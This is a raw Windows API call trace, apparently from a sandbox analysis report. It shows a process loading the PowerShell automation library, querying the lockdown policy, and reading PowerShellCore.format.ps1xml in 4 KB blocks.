	[0045.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.087] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xd7f9625, Data2=0x70b4, Data3=0x42fc, Data4=([0]=0xb8, [1]=0xd, [2]=0xbf, [3]=0x9a, [4]=0xa2, [5]=0xa0, [6]=0xf4, [7]=0x7c))) returned 0x0
	[0045.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0045.089] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b8db0
	[0045.089] GetSystemDirectoryW (in: lpBuffer=0x1505f3b8db0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0045.089] CoTaskMemFree (pv=0x1505f3b8db0) 
	[0045.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0045.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0045.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cef0) returned 1
	[0045.089] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47cfd0 | out: lpFileInformation=0x184b47cfd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0045.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ceb0) returned 1
	[0045.090] WldpGetLockdownPolicy () returned 0x0
	[0045.090] GetSystemInfo (in: lpSystemInfo=0x184b47d030 | out: lpSystemInfo=0x184b47d030*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0045.090] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cf38 | out: phkResult=0x184b47cf38*=0x3d8) returned 0x0
	[0045.091] RegQueryValueExW (in: hKey=0x3d8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47cf88, lpData=0x0, lpcbData=0x184b47cf80*=0x0 | out: lpType=0x184b47cf88*=0x0, lpData=0x0, lpcbData=0x184b47cf80*=0x0) returned 0x2
	[0045.091] RegCloseKey (hKey=0x3d8) returned 0x0
	[0045.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0045.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cf60) returned 1
	[0045.091] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d8
	[0045.091] GetFileType (hFile=0x3d8) returned 0x1
	[0045.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ced0) returned 1
	[0045.092] GetFileType (hFile=0x3d8) returned 0x1
	[0045.092] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x0
	[0045.092] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.093] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1000
	[0045.093] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.093] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2000
	[0045.093] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.093] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x3000
	[0045.093] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.094] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x4000
	[0045.094] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.094] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x5000
	[0045.094] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.094] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x6000
	[0045.094] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.094] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x7000
	[0045.095] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.095] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x8000
	[0045.095] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.095] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x9000
	[0045.095] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.095] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xa000
	[0045.095] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.096] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xb000
	[0045.096] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.096] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xc000
	[0045.096] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.096] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xd000
	[0045.096] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.096] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xe000
	[0045.096] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.097] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xf000
	[0045.097] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.097] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x10000
	[0045.098] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.098] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x11000
	[0045.098] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.099] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x12000
	[0045.099] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.099] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x13000
	[0045.099] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.099] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x14000
	[0045.099] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.099] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x15000
	[0045.099] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.100] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x16000
	[0045.100] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.100] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x17000
	[0045.100] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.100] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x18000
	[0045.100] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.100] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x19000
	[0045.101] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.101] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1a000
	[0045.101] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.101] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1b000
	[0045.101] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.101] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1c000
	[0045.101] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.101] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1d000
	[0045.102] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.102] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1e000
	[0045.102] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.102] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1f000
	[0045.102] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.102] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x20000
	[0045.102] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.103] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x21000
	[0045.103] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.103] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x22000
	[0045.103] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0045.103] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x23000
	[0045.103] ReadFile (in: hFile=0x3d8, lpBuffer=0x1504784b2e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x1504784b2e8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
